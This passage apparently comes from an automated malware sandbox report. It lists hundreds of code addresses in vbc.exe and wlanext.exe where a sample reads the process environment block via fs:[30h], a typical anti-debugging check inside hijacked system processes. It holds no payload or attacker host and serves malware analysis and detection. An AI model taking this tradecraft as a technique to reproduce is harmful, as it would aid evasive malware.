            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05737016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05737016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05737016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05784015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05784015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DB8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DB8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05733884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05733884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05788B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057353CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057353CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05785BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0576D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0576B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0576B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05788A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05744257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F3B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F3B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F58A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F14257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E98A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E85210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E85210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E85210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E85210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EADBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F053CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F053CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F55BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E91B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E91B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F3D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F58B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E858EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E840E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E840E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E840E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAB8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAB8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F1B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F03884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F03884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F51074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F42073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F54015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F54015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F07016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F07016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F07016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F141E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]
